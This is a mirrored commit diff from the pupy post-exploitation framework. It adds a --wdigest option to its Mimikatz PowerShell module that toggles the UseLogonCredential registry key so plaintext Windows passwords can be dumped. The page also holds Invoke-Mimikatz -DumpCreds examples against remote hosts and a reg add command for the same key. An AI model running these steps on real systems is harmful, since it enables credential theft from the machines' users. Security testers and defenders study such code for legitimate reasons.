Rooba
/
pupy
mirror of https://github.com/n1nj4sec/pupy.git
1
1
Fork 0
Code Issues Packages Projects Releases Wiki Activity

managing wdigest key

This commit is contained in:
AlessandroZ 2016-11-18 18:17:50 +01:00
parent 8c42d0a074
commit 7aebdb55b6
1 changed files with 12 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

13
pupy/modules/mimikatz_powershell.py
View File

@ -4,6 +4,7 @@ import os
import re import re
from modules.lib.windows.powershell_upload import execute_powershell_script from modules.lib.windows.powershell_upload import execute_powershell_script
from pupylib.utils.credentials import Credentials from pupylib.utils.credentials import Credentials
from pupylib.utils.rpyc_utils import redirected_stdio
__class_name__="Mimikatz_Powershell" __class_name__="Mimikatz_Powershell"
ROOT=os.path.abspath(os.path.join(os.path.dirname(__file__),"..")) ROOT=os.path.abspath(os.path.join(os.path.dirname(__file__),".."))
@ -23,11 +24,21 @@ Invoke-Mimikatz -DumpCreds -ComputerName @("computer1", "computer2")
Invoke-Mimikatz -Command "privilege::debug exit" -ComputerName "computer1" Invoke-Mimikatz -Command "privilege::debug exit" -ComputerName "computer1"
''' '''
self.arg_parser = PupyArgumentParser(prog="Mimikatz_Powershell", description=self.__doc__, epilog=commands_available) self.arg_parser = PupyArgumentParser(prog="Mimikatz_Powershell", description=self.__doc__, epilog=commands_available)
self.arg_parser.add_argument("--wdigest", choices={'check', 'enable', 'disable'}, default='', help="Creates/Deletes the 'UseLogonCredential' registry key enabling WDigest cred dumping on Windows >= 8.1")
self.arg_parser.add_argument("-o", metavar='COMMAND', dest='command', default='Invoke-Mimikatz', help='command not needed') self.arg_parser.add_argument("-o", metavar='COMMAND', dest='command', default='Invoke-Mimikatz', help='command not needed')
def run(self, args): def run(self, args):
# check if windows 8.1 or Win2012 => reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 # for windows 10, if the UseLogonCredential registry is not present or disable (equal to 0), not plaintext password can be retrieved using mimikatz.
if args.wdigest:
self.client.load_package("pupwinutils.wdigest")
with redirected_stdio(self.client.conn):
ok, message = self.client.conn.modules["pupwinutils.wdigest"].wdigest(args.wdigest)
if ok:
self.success(message)
else:
self.warning(str(message))
return
script ='mimikatz' script ='mimikatz'